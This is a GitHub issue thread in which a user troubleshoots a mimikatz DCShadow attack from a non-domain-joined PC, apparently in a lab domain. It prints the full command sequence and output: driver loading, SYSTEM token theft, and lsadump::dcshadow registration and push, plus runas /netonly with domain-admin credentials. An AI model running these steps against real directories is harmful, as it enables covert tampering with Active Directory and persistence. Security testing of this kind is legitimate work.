search

gentilkiwi / mimikatz

A little tool to play with Windows security
http://blog.gentilkiwi.com/mimikatz
19.3k stars 3.7k forks source link

Can't find way to run Mimikatz in context of a domain administrator on non-domain-joined PC for DC Shadow attack #423

Open rick-engle opened 1 year ago

rick-engle commented 1 year ago

I'm looking for a way to launch mimikatz within the context of an AD domain administrator (DA) so that if I use the token::whoami command it shows me running in that context: mimikatz # token::whoami

The attack PC does have line of sight to a Domain Controller, but I can't figure out how I can start mimikatz in that DA context. Is there a way to do this?

Thanks.

picheljitsu commented 1 year ago

Uhh you try runas already?

On Thu, Mar 16, 2023 at 15:06 rick-engle @.***> wrote:

I'm looking for a way to launch mimikatz within the context of an AD domain administrator (DA) so that if I use the token::whoami command it shows me running in that context: mimikatz # token::whoami

  • Process Token : {0;000003e7} 2 D 1443633 TARGETDOMAIN\ADMINUSER S-1-5-18 (04g,30p) Primary
  • Thread Token : no token

The attack PC does have line of sight to a Domain Controller, but I can't figure out how I can start mimikatz in that DA context. Is there a way to do this?

Thanks.

— Reply to this email directly, view it on GitHub https://github.com/gentilkiwi/mimikatz/issues/423, or unsubscribe https://github.com/notifications/unsubscribe-auth/AEOE6BTG7DH4SP7ZHHWSL2TW4NXGHANCNFSM6AAAAAAV5VXKAU . You are receiving this because you are subscribed to this thread.Message ID: @.***>

rick-engle commented 1 year ago

I did try that but unfortunately I get this error: C:\temp>runas /user:mydomain.com\badadmin "C:\Attackfolder\x64\mimikatz.exe" Enter the password for mydomain.com\badadmin: Attempting to start C:\Attackfolder\x64\mimikatz.exe as user "mydomain.com\badadmin" ... RUNAS ERROR: Unable to run - C:\Attackfolder\x64\mimikatz.exe 1787: The security database on the server does not have a computer account for this workstation trust relationship.

gentilkiwi commented 1 year ago

/netonly

rick-engle commented 1 year ago

Hi @gentilkiwi , That command works but doesn't seem to change the user context. If I use this it launches mimikatz OK, but the whoami still shows me in the context of the local admin account I signed into the Windows PC with: runas /netonly /user:mydomain.com\badadmin "C:\Attackfolder\x64\mimikatz.exe" mimikatz # token::whoami

gentilkiwi commented 1 year ago

The netonly, is ... network only. If all is ok, you'll see correct user in a network cap. by eg.

rick-engle commented 1 year ago

Ok that is good to know. I put everything together for my DC Shadow attack (which I can get working fine on a domain-joined PC) but the first mimikatz session making an attribute change never receives the sync from session #2 making the push. I did turn off the Windows firewalls on this Windows 10 PC as I did on other domain-joined machines where this worked. I guessed at the parameters I needed for the lsadump::dcshadow /object and lsadump::dcshadow /push commands to enable them to find the domain controller. This attack PC DOES have line of sight to the domain controller:

Mimikatz session #1

.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo)

/ \ ## /*** Benjamin DELPY gentilkiwi ( benjamin@gentilkiwi.com )

\ / ## > https://blog.gentilkiwi.com/mimikatz

'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # !+ [+] 'mimidrv' service already registered [*] 'mimidrv' service already started

mimikatz # !processtoken Token from process 0 to process 0

mimikatz # lsadump::dcshadow /object:jeffl /dc:DC1.mydomain.com /attribute:Description /value="My new cool description is swell!" Domain Info

Domain: DC=mydomain,DC=com Configuration: CN=Configuration,DC=mydomain,DC=com Schema: CN=Schema,CN=Configuration,DC=mydomain,DC=com dsServiceName: ,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=mydomain,DC=com domainControllerFunctionality: 6 ( WIN2012R2 ) highestCommittedUSN: 635132

Server Info

Server: DC1.mydomain.com InstanceId : {52021f09-72f2-4471-9114-9e582b9c071c} InvocationId: {254a564c-26b5-45cc-a01a-4774f80bab1a} Fake Server (not already registered): ATTACKER-EXT.mydomain.com

Attributes checking

0: Description

Objects

0: jeffl

DN:CN=JeffL,CN=Users,DC=mydomain,DC=com Description (2.5.4.13-d rev 1): My new cool description is swell! (4d00790020006e0065007700200063006f006f006c0020006400650073006300720069007000740069006f006e0020006900730020007300770065006c006c0021000000)

Starting server

BindString[0]: ncacn_ip_tcp:ATTACKER-EXT[53196] RPC bind registered RPC Server is waiting! == Press Control+C to stop ==

Mimikatz session #2 Launch with: runas /netonly /user:mydomain.com\badadmin "C:\Attackfolder\x64\mimikatz.exe"

mimikatz # token::whoami

mimikatz # lsadump::dcshadow /push ERROR kull_m_net_getDC ; DsGetDcName: 1355

mimikatz # lsadump::dcshadow /push /dc:DC1.mydomain.com Domain Info

Domain: DC=mydomain,DC=com Configuration: CN=Configuration,DC=mydomain,DC=com Schema: CN=Schema,CN=Configuration,DC=mydomain,DC=com dsServiceName: ,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=mydomain,DC=com domainControllerFunctionality: 6 ( WIN2012R2 ) highestCommittedUSN: 635133

Server Info

Server: DC1.mydomain.com InstanceId : {52021f09-72f2-4471-9114-9e582b9c071c} InvocationId: {254a564c-26b5-45cc-a01a-4774f80bab1a} Fake Server (not already registered): ATTACKER-EXT.mydomain.com

Performing Registration

Performing Push

Syncing DC=mydomain,DC=com Sync Done

Performing Unregistration

picheljitsu commented 1 year ago

Are you in a virtualized environment or attached to multiple networks? Also, have you dumped dns traffic to see what’s going on?

On Fri, Mar 17, 2023 at 09:47 rick-engle @.***> wrote:

Ok that is good to know. I put everything together for my DC Shadow attack (which I can get working fine on a domain-joined PC) but the first mimikatz session making an attribute change never receives the sync from session #2 https://github.com/gentilkiwi/mimikatz/issues/2 making the push. I did turn off the Windows firewalls on this Windows 10 PC as I did on other domain-joined machines where this worked. I guessed at the parameters I needed for the lsadump::dcshadow /object and lsadump::dcshadow /push commands to enable them to find the domain controller. This attack PC DOES have line of sight to the domain controller:

Mimikatz session #1 https://github.com/gentilkiwi/mimikatz/issues/1

.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) / \ ## / Benjamin DELPY gentilkiwi ( @. ) \ / ##

https://blog.gentilkiwi.com/mimikatz

'## v ##' Vincent LE TOUX ( @. ) '#####' > https://pingcastle.com / https://mysmartlogon.com /

mimikatz # !+ [+] 'mimidrv' service already registered [*] 'mimidrv' service already started

mimikatz # !processtoken Token from process 0 to process 0

  • from 0 will take SYSTEM token
  • to 0 will take all 'cmd' and 'mimikatz' process Token from 4/System
  • to 4976/cmd.exe
  • to 5704/mimikatz.exe
  • to 2844/mimikatz.exe

mimikatz # lsadump::dcshadow /object:jeffl /dc:DC1.mydomain.com /attribute:Description /value="My new cool description is swell!" Domain Info

Domain: DC=toondom,DC=com Configuration: CN=Configuration,DC=toondom,DC=com Schema: CN=Schema,CN=Configuration,DC=toondom,DC=com dsServiceName: ,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=toondom,DC=com domainControllerFunctionality: 6 ( WIN2012R2 ) highestCommittedUSN: 635132

Server Info

Server: DC1.mydomain.com InstanceId : {52021f09-72f2-4471-9114-9e582b9c071c} InvocationId: {254a564c-26b5-45cc-a01a-4774f80bab1a} Fake Server (not already registered): ATTACKER-EXT.mydomain.com

Attributes checking

0: Description

Objects

0: jeffl

DN:CN=JeffL,CN=Users,DC=toondom,DC=com Description (2.5.4.13-d rev 1): My new cool description is swell!

(4d00790020006e0065007700200063006f006f006c0020006400650073006300720069007000740069006f006e0020006900730020007300770065006c006c0021000000)

Starting server

BindString[0]: ncacn_ip_tcp:ATTACKER-EXT[53196] RPC bind registered RPC Server is waiting! == Press Control+C to stop ==

Mimikatz session #2 https://github.com/gentilkiwi/mimikatz/issues/2 Launch with: runas /netonly /user:mydomain.com\badadmin "C:\Attackfolder\x64\mimikatz.exe"

mimikatz # token::whoami

  • Process Token : {0;00630804} 2 L 6490326 ATTACKER-EXT\georgej S-1-5-21-3967830162-2019074872-1635380170-1000 (12g,05p) Primary
  • Thread Token : no token

mimikatz # lsadump::dcshadow /push ERROR kull_m_net_getDC ; DsGetDcName: 1355

mimikatz # lsadump::dcshadow /push /dc:DC1.mydomain.com Domain Info

Domain: DC=toondom,DC=com Configuration: CN=Configuration,DC=toondom,DC=com Schema: CN=Schema,CN=Configuration,DC=toondom,DC=com dsServiceName: ,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=toondom,DC=com domainControllerFunctionality: 6 ( WIN2012R2 ) highestCommittedUSN: 635133

Server Info

Server: DC1.mydomain.com InstanceId : {52021f09-72f2-4471-9114-9e582b9c071c} InvocationId: {254a564c-26b5-45cc-a01a-4774f80bab1a} Fake Server (not already registered): ATTACKER-EXT.mydomain.com

Performing Registration

Performing Push

Syncing DC=toondom,DC=com Sync Done

Performing Unregistration

— Reply to this email directly, view it on GitHub https://github.com/gentilkiwi/mimikatz/issues/423#issuecomment-1473956085, or unsubscribe https://github.com/notifications/unsubscribe-auth/AEOE6BSZ6YYDSEXMKQTUVU3W4R2OPANCNFSM6AAAAAAV5VXKAU . You are receiving this because you commented.Message ID: @.***>

bbhorrigan commented 1 year ago

This seems like you are having network issues reading thru this, because I can't imagine this not being related to some type of network issue.